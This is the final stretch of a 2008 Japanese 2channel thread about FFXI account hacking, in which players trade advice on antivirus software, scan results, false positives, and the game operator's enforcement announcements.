キミみたいなのがハックされてもなんの不思議も無い

とりあえず>>1見てテンプレで報告してくれたらありがたい

955 名前:既にその名前は使われています:2008/09/25(木) 02:21:35 ID:ibBNqA1U
>>928
豪邸建設中に殺されて金奪われる

956 名前:既にその名前は使われています:2008/09/25(木) 03:00:06 ID:iT1BwDEC
ウイルスセキュリティゼロでスキャンかけたらTrojan.Win32.Agent.DOXNとかいうのがでてきた。
ぐぐっても一致する情報がでないし、これなんぞ・・・

957 名前:既にその名前は使われています:2008/09/25(木) 03:10:23 ID:iXIQwalK
>>956
@nifty ウイルスチェックサービス(無料)で調てみるよろし
ttp://www.nifty.com/security/vcheck/

958 名前:既にその名前は使われています:2008/09/25(木) 03:17:38 ID:iT1BwDEC
>>957
ありがとう、まだスキャン中なので終わったらそちらでもやってみる。

959 名前:既にその名前は使われています:2008/09/25(木) 03:23:32 ID:yrLjKRZH
まあ、カペルは正規プログラムでもブロック(マイクロソフトの正規プログラムでもウイルス判定だしたw)するからなー
複数のオンラインスキャンもして、何もなかったら取り敢えず大丈夫?かなって程度。

960 名前:既にその名前は使われています:2008/09/25(木) 03:54:41 ID:iT1BwDEC
スキャン完了、ニフティでは何も検出されず。(ゼロで駆除した後だからでてきても困るが)
今日はもう遅いので明日カスペでもかけてみよう・・・

961 名前:既にその名前は使われています:2008/09/25(木) 04:47:40 ID:F5E1o360
ウィルス(に対しての)セキュリティ(が)ゼロ

962 名前:既にその名前は使われています:2008/09/25(木) 09:15:40 ID:JSnoXGg0
本気でウィルスセキュリティ0つかってるやついたのかw
マジで安かろう悪かろうを地でいくソフトだぞw

963 名前:既にその名前は使われています:2008/09/25(木) 11:02:14 ID:1Ic6ACnb
あぐ

964 名前:既にその名前は使われています:2008/09/25(木) 11:18:16 ID:7P/6hAsc
カスペ2009の無償バージョンアップのお知らせが来たわけだが
今安定して動いてるものにいれるのはちょっと躊躇するなぁ。

965 名前:既にその名前は使われています:2008/09/25(木) 11:42:22 ID:yrLjKRZH
ゼロはなー。
悪いって訳じゃないけど、
「ゆっくりしていってね!」系の週一でネットに繋げる人用のウイルスソフトだからなー(と、俺の中での位置付け)
ネトゲするような人には向いてないよなー。あのソフト。

966 名前:既にその名前は使われています:2008/09/25(木) 12:27:28 ID:sayLKFZE
>>964
3ヶ月から半年ぐらいしてソフトがこなれてからの方がいいと思う。
別にすぐバージョンアップしないとパターンファイルやらが更新されないって言う事が無い限りには

967 名前:既にその名前は使われています:2008/09/25(木) 14:40:16 ID:9wrHarCg
今日ノートンでTrojan.ByteVerifyってのが引っかかりました
駆除してパス変えたけどこれが垢ハックのウイルスかも

968 名前:既にその名前は使われています:2008/09/25(木) 14:51:30 ID:AlVb+AUx
MS03-011の虚弱性って何年前のウイルスですかw

969 名前:既にその名前は使われています:2008/09/25(木) 14:56:02 ID:GCfQ6hR2
>>967
ttp://www.symantec.com/region/jp/sarcj/data/t/trojan.byteverify.html

970 名前:既にその名前は使われています:2008/09/25(木) 15:01:18 ID:3+zTmnxM
>>969
>>967はスケベさん、ッて事?

971 名前:既にその名前は使われています:2008/09/25(木) 15:04:27 ID:GCfQ6hR2
>>970
いえ、そういうつもりで出したわけではありません
駆除方法がけっこうやっかいなので、このページは見たのかな?と
思って出しただけです

972 名前:既にその名前は使われています:2008/09/25(木) 16:49:18 ID:tM+feruE
>>968
つられてやるクマー

× 虚弱性(きょじゃくせい)
○ 脆弱性(ぜいじゃくせい)

973 名前:既にその名前は使われています:2008/09/25(木) 16:50:29 ID:gm2XoDPh
虚弱性wwwwwwww
これはひどいwwwww

974 名前:既にその名前は使われています:2008/09/25(木) 18:02:26 ID:DQ/51Pn6
Vana'diel Wiki World Map Guide
//ffxi.logue.be/

aguseで確認したらURLは存在しないと出たのですがページは存在してます。
お気に入り整理でうっかり踏んじゃったのですがここって大丈夫でしょうか?
テンプレの鑑定スレは数日レスがついてないし、既に巻き戻し使っちゃってるので次がないため
不安なのでスレチ承知で伺いに来ました。

ブラウザはfirefox3.0+NoScriptです。

975 名前:既にその名前は使われています:2008/09/25(木) 19:03:40 ID:1Ic6ACnb
>>974
携帯からなので簡略に。ほぼ同じ環境で18時50分ごろ踏んだ限りは無問題だった
どの瞬間に改竄されるか分からないから974が大丈夫とまでは言い切れないけどね。
あと火狐は3.0.2にしておきなよ。

ってかいつのまにかほぼ全鯖で規制食らってて俺の怒りが有頂天

976 名前:既にその名前は使われています:2008/09/25(木) 19:17:57 ID:DQ/51Pn6
>>975さん
ありがとー!
ノートン、ニフティ、カスペで何も出なかったので大丈夫かなとは思ったのですが
本当に不安で仕方なかったのです、大分安心しました。

私も規制食らってるらしく携帯からでした。
本当にありがとう、火狐は早速3.0.2にいたします。

977 名前:既にその名前は使われています:2008/09/25(木) 19:22:11 ID:cBmZZ5+P
カスペが8.0になってファイアウォール設定がかなりわかりにくくなったな



978 名前:既にその名前は使われています:2008/09/25(木) 19:35:52 ID:cHuWMkyb
それほどでもない

979 名前:既にその名前は使われています:2008/09/25(木) 20:40:40 ID:IVh6iRoV
カスペ2009にしたら、POL.exeがキーロガー反応しまくりだ
どうしたものか

980 名前:既にその名前は使われています:2008/09/25(木) 20:44:32 ID:cBmZZ5+P
ステータスの項目から除外でOK

981 名前:既にその名前は使われています:2008/09/25(木) 20:52:18 ID:IVh6iRoV
ただの誤検出なのかなあ
スキャンしても問題なかったけども

982 名前:既にその名前は使われています:2008/09/25(木) 21:32:52 ID:MFgTlGJp
age-ume

983 名前:既にその名前は使われています:2008/09/25(木) 21:35:58 ID:YFwcpSCb
後検出っていうか設定ガチガチにしすぎるとネットに送受信するだけで感知されるぞカスペ

984 名前:既にその名前は使われています:2008/09/25(木) 22:03:55 ID:f07u3sI2
規約違反行為者への一斉対処について (9/25)
ttp://www.playonline.com/ff11/polnews/news14403.shtml

スペシャルタスクチームレポート (2008/09/25)
ttp://www.playonline.com/pcd/topics/ff11/detail/3704/detail.html

985 名前:既にその名前は使われています:2008/09/25(木) 22:11:13 ID:PbwGcKWu
有料αのカスペ8にした奴がいるとは・・・
流石に乙としか言いようがないですが何故もう少し待てんのだ

986 名前:839:2008/09/25(木) 22:21:39 ID:y4lJHErx
>>984
不正アクセスのことがほとんどだな
やっぱ急増してるのか
自衛汁ばっかりでもうちょい具体的な対策立てられんのかね
2度喰らったら実質引退コースだし

そもそも■eは警察に被害届とか出してんの?
法的に抑止力行使しないと絶対減らないだろ

987 名前:既にその名前は使われています:2008/09/25(木) 22:22:48 ID:y4lJHErx
名前残ってたw
データ復元早くやってくれww

988 名前:既にその名前は使われています:2008/09/25(木) 22:26:16 ID:GCfQ6hR2
次スレ

●● RMT業者の垢ハックが多発している件40 ●●
http://changi.2ch.net/test/read.cgi/ogame/1222348979/l50

989 名前:既にその名前は使われています:2008/09/25(木) 22:27:43 ID:PbwGcKWu
>>986
有料で対応してもいいかもな。
だが一人数万円の費用になると思うけどどうだろか?
警察への被害届は毎回出しているみたいだよ

現行の法ではどうにもならんってことらしいけど、抑止効果が出てきたら抑止が効かな方向に逃げるだけだから
長期的に見ると意味ないんだよね。どんな犯罪でも同じだけどね。
まずやるべきは犯罪が起きてからの対応じゃなくてスクエニ側の犯罪が起きにくくする対策なんだろうけど、一番効果があるのが競売。競売停止したらゲーム変わってしまうだろうか?

990 名前:既にその名前は使われています:2008/09/25(木) 22:30:07 ID:GCfQ6hR2
>>986
法的抑止力になりえるものが存在しないから問題なのです
せいぜいできることは、国内の中継ポイントを潰すことくらいです

991 名前:既にその名前は使われています:2008/09/25(木) 22:34:09 ID:UJ4aIONQ
ウィルスセキュリティーゼロで、ハック前後検疫したけど、反応なし。。。

992 名前:既にその名前は使われています:2008/09/25(木) 22:36:35 ID:GCfQ6hR2
>>991
埋めネタですね?

993 名前:既にその名前は使われています:2008/09/25(木) 22:37:04 ID:IzRmGqFc
かスペル2009入れて見た インストール後の無防備verうpに驚愕した あれがロシアの悪夢ですか?

994 名前:既にその名前は使われています:2008/09/25(木) 22:41:03 ID:USv+0OD7
埋め

995 名前:既にその名前は使われています:2008/09/25(木) 22:41:57 ID:y4lJHErx
何つーか、ここまでセキュリティに神経質にならないと
まともに遊べない状態って、サービスとして異常すぐると思う
嫌なら辞めてもいいんじゃぞなのかもしれないけど
こればっかりはマジで辞めたくなったわ
データ復元なかったら100%引退してたな

996 名前:既にその名前は使われています:2008/09/25(木) 22:42:53 ID:PbwGcKWu
>>991
ウィルスセキュリティーゼロって名前でウィルスの脅威が払えたら詐欺じゃん
名前通りだから問題ないな

997 名前:既にその名前は使われています:2008/09/25(木) 22:44:10 ID:UJ4aIONQ
いや。まじ
感染して削除したあと、ウィルスチェックしたあとパス毎回かえてたけどハックされた。
友達がいうようにハードディスクを初期化しとけばよかったよ

998 名前:既にその名前は使われています:2008/09/25(木) 22:49:41 ID:USv+0OD7
まじとかいわれても
別にゼロいれてハクられても誰も驚かないと思う

999 名前:既にその名前は使われています:2008/09/25(木) 22:50:15 ID:cHuWMkyb
ウィルスセキュリティーゼロ なんて守ってないのと同じだっつーの
そんなソフト使う気にもならんわ
パス毎回変えたって、感染してて自動ログインなら意味ない




1000 名前:既にその名前は使われています:2008/09/25(木) 22:52:14 ID:GCfQ6hR2
しぇん

1001 名前:1001:Over 1000 Thread
  === Area: Live Networkgames@2ch http://changi.2ch.net/ogame/ ===

      //
    / .人      あ、ぽこたんインできないお!
    /  (__) パカ
   / ∩(____)       このスレッドは1000を超えたお。。。
   / .|( ・∀・)_       もう書けないので、新しいスレッドにインするお!
  // |   ヽ/
  " ̄ ̄ ̄"∪



戻る 全部 最新50
DAT2HTML 0.35cFIX Converted.